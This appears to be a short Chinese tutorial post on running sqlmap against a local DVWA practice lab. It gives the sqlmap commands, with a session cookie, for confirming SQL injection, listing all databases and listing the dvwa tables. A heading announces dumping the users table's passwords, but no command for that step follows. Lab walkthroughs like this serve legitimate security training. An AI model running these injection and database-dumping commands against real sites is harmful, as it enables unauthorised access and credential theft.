DVWA-使用sqlmap 进行sql注入过程

前置关键说明

DVWA 存在登录 Cookie 校验,不带 Cookie 扫描会直接 302 跳转登录页,无法注入,必须带上登录 Cookie 参数。

##python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=你的session值; security=low" --batch

python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=orcs9ce2kse8t2cjckh7ce418h;; security=low" --batch

查询所有数据库

python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=orcs9ce2kse8t2cjckh7ce418h; security=low" --batch --dbs

dvwa 库下所有表

python sqlmap.py -u "http://127.0.0.1:50/DVWA/vulnerabilities/sqli/?id=1\&Submit=Submit" --cookie "PHPSESSID=orcs9ce2kse8t2cjckh7ce418h; security=low" --batch -D dvwa --tables

导出 users 表全部账号密码(核心脱库)

相关推荐
nianniannnn1 小时前
Qt QMessageBox知识点
开发语言·数据库·qt
—Miss. Z—1 小时前
计算机二级MySQL——简单应用题(存储过程&存储函数)
数据库·oracle·php
Csvn2 小时前
📊 SQL 入门 Day 9:CTE(公用表表达式)— 让 SQL 像写代码一样优雅
后端·sql
我不是QI2 小时前
一、主持人信息(域名 网站资产情报搜集)原理解析
安全·网络安全
Vect__2 小时前
MySQL 数据类型和约束:从字段设计到表结构建模
数据库·mysql
虹科网络安全2 小时前
艾体宝新闻|从 SQL 注入到服务器接管:CVE-2026-57517 暴露 Web 管理面板的供应链与安全编码风险
服务器·前端·sql
张人玉2 小时前
C# WinForms——工厂管理系统(C# WinForms)
数据库·sqlite·c#·winform
AC赳赳老秦3 小时前
招投标公开数据自动化采集实战:基于 OpenClaw 的定时抓取与业务关键词精准推送
运维·服务器·数据库·自动化·测试用例·deepseek·openclaw
2501_916008893 小时前
HTTPS 抓包遇到证书绑定怎么办,使用 TraceEagle 解除 App 证书校验
网络协议·计算机网络·http·网络安全·ios·adb·https
后端优选官4 小时前
上海Agent开发公司:企业级智能体软件的技术架构与落地评估
数据库·人工智能·架构·软件开发·开发经验·上海